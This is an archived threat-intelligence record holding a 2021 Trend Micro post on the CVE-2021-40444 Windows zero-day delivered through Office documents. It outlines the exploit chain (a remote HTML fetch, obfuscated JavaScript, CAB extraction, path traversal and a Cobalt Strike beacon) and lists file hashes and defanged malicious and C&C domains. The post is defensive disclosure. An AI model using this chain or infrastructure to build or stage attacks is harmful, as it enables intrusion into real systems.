{
	"id": "841b1b21-6168-46fb-8af2-fb4ca8ab5aa3",
	"created_at": "2026-04-06T00:20:12.218588Z",
	"updated_at": "2026-04-10T03:20:32.184908Z",
	"deleted_at": null,
	"sha1_hash": "282368ee28e9938a54735945158c2fe6cbe76eb3",
	"title": "Remote Code Execution Zero-Day (CVE-2021-40444) Hits Windows, Triggered Via Office Docs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 629012,
	"plain_text": "Remote Code Execution Zero-Day (CVE-2021-40444) Hits Windows,\r\nTriggered Via Office Docs\r\nBy By: Trend Micro Sep 09, 2021 Read time: 2 min (453 words)\r\nPublished: 2021-09-09 · Archived: 2026-04-05 17:20:58 UTC\r\nExploits \u0026 Vulnerabilities\r\nMicrosoft has disclosed the existence of a new zero-day vulnerability that affects multiple versions of Windows. This\r\nvulnerability (designated as CVE-2021-40444) is currently delivered via malicious Office 365 documents and requires user\r\ninput to open the file to trigger.\r\nMicrosoft has disclosed the existence of a new zero-day vulnerability that affects multiple versions of Windows. This\r\nvulnerability (designated as CVE-2021-40444open on a new tab) is currently delivered via malicious Office 365 documents\r\nand requires user input to open the file to trigger. It should be noted that by default, Office documents downloaded from the\r\ninternet are opened either in Protected Viewopen on a new tab or Application Guardopen on a new tab, both of which would\r\nmitigate this particular attack.\r\nIf the attacker is able to convince the victim to download the file and bypass any mitigation, it would trigger the\r\nvulnerability and cause a malicious file to be downloaded and run on the affected machine. Currently, this vulnerability is\r\nused to deliver Cobalt Strike payloads.\r\nMicrosoft has issued an official bulletin covering this vulnerability. This blog entry discusses how the exploit may work, as\r\nwell as Trend Micro solutions.\r\nWe have obtained multiple samples of documents that exploit this vulnerability. The documents all contain the following\r\ncode in the document.xml.rels file in their package:\r\nFigure 1. Code with XML relationships\r\nNote the presence of a URL (which we have removed) that downloads a file titled side.html (SHA-256:\r\nd0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6). This file contained obfuscated JavaScript; the\r\nimage in Figure 2 shows part of the deobfuscated code.\r\nhttps://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html\r\nPage 1 of 4\n\nFigure 2. Deobfuscated JavaScript code\r\nSeveral actions can be seen in this code: it downloads a .CAB file, extracts a .DLL file from the said .CAB file, and uses\r\npath traversal attacks to run the file (which is named championship.inf).\r\nEventually, this leads to the execution of the championship.inf file, as seen below:\r\nFigure 3. Properties for execution of payload\r\nThis payload is a Cobalt Strike beacon (SHA-256:\r\n6eedf45cb91f6762de4e35e36bcb03e5ad60ce9ac5a08caeb7eda035cd74762b), which we detect as\r\nBackdoor.Win64.COBEACON.OSLJAUopen on a new tab. As is typically the case with Cobalt Strike, this could allow an\r\nattacker to take control of the affected system. The malicious Office files are detected as\r\nTrojan.W97M.CVE202140444.Aopen on a new tab, with the malicious .CAB file detected as\r\nTrojan.Win64.COBEACON.SUZopen on a new tab.\r\nAs we noted earlier, Microsoft has yet to release an official patch. We reiterate our long-standing advice to avoid opening\r\nfiles from unexpected sources, which could considerably lower the risk of this threat as it requires the user to actually open\r\nthe malicious file.\r\nhttps://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html\r\nPage 2 of 4\n\nWe will update this post as necessary if more information becomes available. Updates on Trend Micro solutions can be\r\nfound on this knowledge base pageopen on a new tab. \r\nIndicators of Compromise\r\nSHA-256\r\nFile\r\nDescription\r\nDetection Name\r\n1fb13a158aff3d258b8f62fe211fabeed03f0763b2acadbccad9e8e39969ea00\r\nPayload\r\n(CAB)\r\nTrojan.Win64.COBEACON.SUZ\r\n5b85dbe49b8bc1e65e01414a0508329dc41dc13c92c08a4f14c71e3044b06185\r\nExploited\r\nDoc\r\nTrojan.W97M.CVE202140444.A\r\n3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf\r\n199b9e9a7533431731fbb08ff19d437de1de6533f3ebbffc1e13eeffaa4fd455\r\n938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52\r\nd0e1f97dbe2d0af9342e64d460527b088d85f96d38b1d1d4aa610c0987dca745\r\na5f55361eff96ff070818640d417d2c822f9ae1cdd7e8fa0db943f37f6494db9\r\n6eedf45cb91f6762de4e35e36bcb03e5ad60ce9ac5a08caeb7eda035cd74762b\r\nPayload\r\n(DLL)\r\nBackdoor.Win64.COBEACON.OSL\r\nd0fd7acc38b3105facd6995344242f28e45f5384c0fdf2ec93ea24bfbc1dc9e6\r\nDownloaded\r\nJS\r\nTrojan.JS.TIVEX.A\r\nURL Category\r\nhxxp://hidusi[.]com/\r\nMalware Accomplice\r\nhxxp://hidusi[.]com/e273caf2ca371919/mountain[.]html\r\nhxxp://hidusi[.]com/94cc140dcee6068a/help[.]html\r\nhxxp://hidusi[.]com/e8c76295a5f9acb7/side[.]html\r\nhxxp://hidusi[.]com/e8c76295a5f9acb7/ministry[.]cab\r\nhxxps://joxinu[.]com\r\nC\u0026C Server\r\nhxxps://joxinu[.]com/hr[.]html\r\nhxxps://dodefoh[.]com\r\nhxxps://dodefoh[.]com/ml[.]html\r\nhxxp://pawevi[.]com/e32c8df2cf6b7a16/specify.html\r\nhxxp://sagoge[.]com/  Malware Accomplice\r\nhxxps://comecal[.]com/ \r\nhxxps://rexagi[.]com/ \r\nhxxp://sagoge[.]com/get_load \r\nhxxps://comecal[.]com/static-directory/templates[.]gif\r\nhxxps://comecal[.]com/ml[.]js?restart=false \r\nhttps://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html\r\nPage 3 of 4\n\nhxxps://comecal[.]com/avatars\r\nhxxps://rexagi[.]com:443/avatars\r\nhxxps://rexagi[.]com/ml[.]js?restart=false\r\nhxxps://macuwuf[.]com \r\nhxxps://macuwuf[.]com/get_load\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html\r\nhttps://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html"
	],
	"report_names": [
		"remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434812,
	"ts_updated_at": 1775791232,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/282368ee28e9938a54735945158c2fe6cbe76eb3.pdf",
		"text": "https://archive.orkl.eu/282368ee28e9938a54735945158c2fe6cbe76eb3.txt",
		"img": "https://archive.orkl.eu/282368ee28e9938a54735945158c2fe6cbe76eb3.jpg"
	}
}